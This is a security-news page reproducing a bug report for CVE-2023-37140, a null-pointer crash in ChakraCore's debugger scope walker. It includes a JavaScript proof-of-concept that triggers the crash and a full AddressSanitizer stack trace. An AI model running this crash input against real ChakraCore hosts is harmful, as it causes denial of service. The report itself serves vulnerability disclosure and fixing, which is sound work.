Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37140: SEGV (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf) in Js::DiagScopeVariablesWalker::GetChildrenCount() · Issue #6885 · chakra-core/ChakraCore

ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::DiagScopeVariablesWalker::GetChildrenCount().

CVE
Open in Source
#linux#js#java#amd

Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17

POC:

function Run() {
    function f1() {
        var m = 31;
        m++;
        var coll = new Intl.Collator();
        m += f2();
        return m;
    }

    function f2() {
        return 100;
    }

    function test6() {
        var formatter = new Intl.NumberFormat("en-US");/**bp:locals();resume('step_over');locals();resume('step_into');locals();stack();resume('step_out');locals();stack();**/ 
        try {
        throw -1;
    }
    catch { // catch scope
        let b = 2;
        (function g() {
            var c = 3;
            a; b; c; /**bp:locals(1)**/
        })();
    }
        formatter;
        formatter = new Intl.NumberFormat("en-US"); /**bp:locals();resume('step_into');locals();**/
    }
    test6();

    function test8() {
        function test7() {
            var d = new Date(2013, 1, 1);     
            [d.toLocaleString].every(function (f) {
                f; /**bp:resume('step_out');locals();stack()**/
                return f;
            });
            return d;
        }
        test7();        /**bp:locals();resume('step_into');locals();removeExpr()**/
    }
    test8();


    function test9() {
        var k = 10;
        function test10 () {
            var k1 = 10; /**bp:locals()**/
            return k1;
        }
        k+= test10(); /**bp:resume('step_over');**/
    }
    test9();
    WScript.Echo("Pass");
}
WScript.Attach(Run);

Error info:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10311==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55570e6a7ab0 bp 0x7ffc8f8a7a70 sp 0x7ffc8f8a79a0 T0)
==10311==The signal is caused by a READ memory access.
==10311==Hint: address points to the zero page.
    #0 0x55570e6a7aaf in Js::DiagScopeVariablesWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf)
    #1 0x55570e6adb4c in Js::LocalsWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8c2b4c)
    #2 0x55570e2e47ca in JsrtDebuggerStackFrame::GetLocalsObject(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4f97ca)
    #3 0x55570e3767f5 in JsDiagGetStackProperties (/root/ChakraCore-latest/out/Release/ch+0x58b7f5)
    #4 0x55570e1a596b in Debugger::GetStackProperties(void*, bool, void**, unsigned short, void*) (/root/ChakraCore-latest/out/Release/ch+0x3ba96b)
    #5 0x55570ed9bf61 in Js::JavascriptExternalFunction::StdCallExternalFunctionThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb0f61)
    #6 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #7 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #8 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #9 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #10 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #11 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #12 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #13 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #14 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #15 0x55570eb46de1 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5bde1)
    #16 0x55570e8e92d9 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafe2d9)
    #17 0x55570e83d1dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
    #18 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #19 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #20 0x7f2e8c681f41  (<unknown module>)
    #21 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #22 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #23 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #24 0x55570eb449c5 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd599c5)
    #25 0x55570eb44421 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59421)
    #26 0x55570e8e9dd8 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafedd8)
    #27 0x55570e83d1dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
    #28 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #29 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #30 0x7f2e8c681eb9  (<unknown module>)
    #31 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #32 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #33 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #34 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #35 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #36 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #37 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #38 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #39 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #40 0x55570e877d79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
    #41 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #42 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #43 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #44 0x7f2e8c681ef1  (<unknown module>)
    #45 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #46 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #47 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #48 0x55570eb44b55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
    #49 0x55570e878893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
    #50 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #51 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #52 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #53 0x7f2e8c681f01  (<unknown module>)
    #54 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #55 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #56 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #57 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #58 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #59 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #60 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #61 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #62 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #63 0x55570e877d79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
    #64 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #65 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #66 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #67 0x7f2e8c681f09  (<unknown module>)
    #68 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #69 0x55570e50c31a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
    #70 0x55570e50a36d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
    #71 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #72 0x55570eda1a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #73 0x55570eda172f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #74 0x55570e29a75a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #75 0x55570e1a7c15 in Debugger::CallFunction(char const*, void**, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3bcc15)
    #76 0x55570e1a4319 in Debugger::HandleDebugEvent(_JsDiagDebugEvent, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b9319)
    #77 0x55570e2d9d20 in JsrtDebugManager::CallDebugEventCallback(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0x4eed20)
    #78 0x55570e2daf0a in JsrtDebugManager::CallDebugEventCallbackForBreak(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4eff0a)
    #79 0x55570e2d87c3 in JsrtDebugManager::ReportBreak(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed7c3)
    #80 0x55570e2d82a5 in JsrtDebugManager::DispatchHalt(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed2a5)
    #81 0x55570e6e3dc9 in Js::ProbeContainer::DispatchStepHandler(Js::InterpreterHaltState*, Js::OpCode*) (/root/ChakraCore-latest/out/Release/ch+0x8f8dc9)
    #82 0x55570e8562a0 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6b2a0)
    #83 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #84 0x55570e8f9670 in Js::InterpreterStackFrame::OP_TryCatch(Js::OpLayoutBr const __unaligned*) (/root/ChakraCore-latest/out/Release/ch+0xb0e670)
    #85 0x55570e862238 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa77238)
    #86 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #87 0x55570e83b981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
    #88 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #89 0x7f2e8c680f91  (<unknown module>)
    #90 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #91 0x55570e50a65a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
    #92 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #93 0x55570eb44b55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
    #94 0x55570eb44421 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59421)
    #95 0x55570e85a174 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6f174)
    #96 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #97 0x55570e83b981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
    #98 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #99 0x7f2e8c680f99  (<unknown module>)
    #100 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #101 0x55570e50a65a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
    #102 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #103 0x55570eda1a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #104 0x55570eda172f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #105 0x55570e29a75a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #106 0x55570e1c2b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
    #107 0x55570e1c5e0b in CustomMessage<WScriptJsrt::AttachCallback(void*, bool, void**, unsigned short, void*)::$_1, WScriptJsrt::CallbackMessage>::Call(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3dae0b)
    #108 0x55570e19f804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
    #109 0x55570e1a2913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
    #110 0x55570e1a3606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #111 0x7f2e90b81c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #112 0x55570e0a1d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf) in Js::DiagScopeVariablesWalker::GetChildrenCount()
==10311==ABORTING

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE